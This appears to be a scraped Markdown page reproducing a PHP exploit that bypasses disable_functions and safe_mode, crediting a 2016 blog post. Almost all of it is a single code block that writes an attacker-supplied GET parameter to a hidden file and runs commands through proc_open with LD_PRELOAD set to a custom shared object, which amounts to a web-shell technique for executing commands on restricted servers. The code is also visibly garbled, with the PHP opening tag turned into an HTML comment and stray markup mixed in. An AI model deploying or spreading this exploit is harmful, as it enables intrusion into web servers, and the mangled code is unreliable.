19 lines
902 B
Markdown
19 lines
902 B
Markdown
|
# disable\_functions bypass - PHP safe\_mode bypass via proc\_open\(\) and custom environment Exploit
|
||
|
|
|
||
|
|
## PHP safe\_mode bypass via proc\_open\(\) and custom environment Exploit
|
||
|
|
|
||
|
|
From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
|
||
|
|
|
||
|
|
```php
|
||
|
|
<!--p $path="/var/www"; //change to your writable path $a=fopen($path."/.comm","w"); fputs($a,$_GET["c"]); fclose($a); $descriptorspec = array( 0--> array("pipe", "r"),
|
||
|
|
1 => array("file", $path."/output.txt","w"),
|
||
|
|
2 => array("file", $path."/errors.txt", "a" )
|
||
|
|
); $cwd = '.'; $env = array('LD_PRELOAD' => $path."/a.so"); $process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed sleep(1); $a=fopen($path."/.comm1","r");
|
||
|
|
echo "<strong>";
|
||
|
|
while (!feof($a))
|
||
|
|
{$b=fgets($a);echo $b;} fclose($a);
|
||
|
|
?>;
|
||
|
|
</strong>
|
||
|
|
```
|
||
|
|
|